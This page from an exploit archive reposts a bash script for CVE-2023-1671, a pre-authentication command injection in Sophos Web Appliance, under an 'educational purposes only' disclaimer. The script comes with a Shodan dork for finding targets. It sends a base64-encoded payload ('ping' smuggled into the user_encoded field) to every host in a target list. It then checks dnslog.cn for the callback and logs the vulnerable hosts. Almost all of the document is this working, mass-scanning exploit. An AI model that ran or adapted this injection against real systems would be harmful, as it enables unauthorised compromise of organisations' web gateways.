Sophos web appliance 4.3.10.4 preauth command injection Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-04-25 | Type : webapps | Platform : php
This exploit / vulnerability Sophos web appliance 4.3.10.4 preauth command injection is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

#!/bin/bash
# Exploit Title: Sophos Web Appliance 4.3.10.4 - Pre-auth command injection
# Exploit Author: Behnam Abasi Vanda
# Vendor Homepage: https://www.sophos.com
# Version: Sophos Web Appliance older than version 4.3.10.4
# Tested on: Ubuntu
# CVE : CVE-2023-1671
# Shodan Dork: title:"Sophos Web Appliance"
# Reference : https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce
# Reference : https://vulncheck.com/blog/cve-2023-1671-analysis



TARGET_LIST="$1"

# =====================
BOLD="\033[1m"
RED="\e[1;31m"
GREEN="\e[1;32m"
YELLOW="\e[1;33m"
BLUE="\e[1;34m"
NOR="\e[0m"
# ====================


get_new_subdomain()
{
cat MN.txt | grep 'YES' >/dev/null;ch=$?
if [ $ch -eq 0 ];then
echo -e " [+] Trying to get Subdomain $NOR"
rm -rf cookie.txt
sub=`curl -i -c cookie.txt -s -k -X $'GET' \
-H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \
$'http://www.dnslog.cn/getdomain.php?t=0' | grep dnslog.cn`
echo -e " [+]$BOLD$GREEN Subdomain : $sub $NOR"
fi
}

check_vuln()
{
curl -k --trace-ascii % "https://$1/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';ping $sub -c 3 #" | base64)"

req=`curl -i -s -k -b cookie.txt -X $'GET' \
-H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \
$'http://www.dnslog.cn/getrecords.php?t=0'`

echo "$req" | grep 'dnslog.cn' >/dev/null;ch=$?
if [ $ch -eq 0 ];then
echo "YES" > MN.txt
echo -e " [+]$BOLD $RED https://$1 Vulnerable :D $NOR"
echo "https://$1" >> vulnerable.lst
else
echo -e " [-] https://$1 Not Vulnerable :| $NOR"
echo "NO" > MN.txt
fi
}

echo '

██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██████╗███████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ███║██╔════╝╚════██║
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗╚██║███████╗ ██╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝ ██║██╔═══██╗ ██╔╝
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██║╚██████╔╝ ██║
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝ ╚═════╝ ╚═╝

██████╗ ██╗ ██╗ ██████╗ ███████╗██╗ ██╗███╗ ██╗ █████╗ ███╗ ███╗ ██╗
██╔══██╗╚██╗ ██╔╝ ██╔══██╗██╔════╝██║ ██║████╗ ██║██╔══██╗████╗ ████║ ██╗╚██╗
██████╔╝ ╚████╔╝ ██████╔╝█████╗ ███████║██╔██╗ ██║███████║██╔████╔██║ ╚═╝ ██║
██╔══██╗ ╚██╔╝ ██╔══██╗██╔══╝ ██╔══██║██║╚██╗██║██╔══██║██║╚██╔╝██║ ▄█╗ ██║
██████╔╝ ██║ ██████╔╝███████╗██║ ██║██║ ╚████║██║ ██║██║ ╚═╝ ██║ ▀═╝██╔╝
╚═════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝

'
if test "$#" -ne 1; then
echo " ----------------------------------------------------------------"
echo " [!] please give the target list file : bash CVE-2023-1671.sh targets.txt "
echo " ---------------------------------------------------------------"
exit
fi



rm -rf cookie.txt
echo "YES" > MN.txt
for target in `cat $TARGET_LIST`
do

get_new_subdomain;
echo " [~] Checking $target"
check_vuln "$target"
done
rm -rf MN.txt
rm -rf cookie.txt